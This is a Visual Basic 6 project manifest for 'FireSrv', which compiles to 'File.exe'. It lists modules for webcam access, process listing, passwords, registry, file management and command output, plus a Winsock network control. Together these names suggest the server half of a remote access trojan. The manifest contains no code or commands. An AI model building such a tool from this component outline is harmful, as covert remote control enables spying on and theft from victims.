Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation
Class=Class1; Class1.cls
Module=Module1; Module1.bas
Module=mdlwebcam; mdlwebcam.bas
Form=Form2.frm
Form=Form3.frm
Module=processitask; processitask.bas
Module=Module2; Module2.bas
Module=Module3; Module3.bas
Module=Fun; Fun.bas
Form=Form4.frm
Class=DOSOutputs; DOSOutputs.cls
Module=Sound; Sound.bas
Module=mdlFileManager; Module4.bas
Module=Function; Function.bas
Module=Password; Password.bas
Module=Reg; Reg.bas
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
ResFile32="Project1.RES"
IconForm="Form1"
Startup="Form1"
ExeName32="File.exe"
Command32=""
Name="FireSrv"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
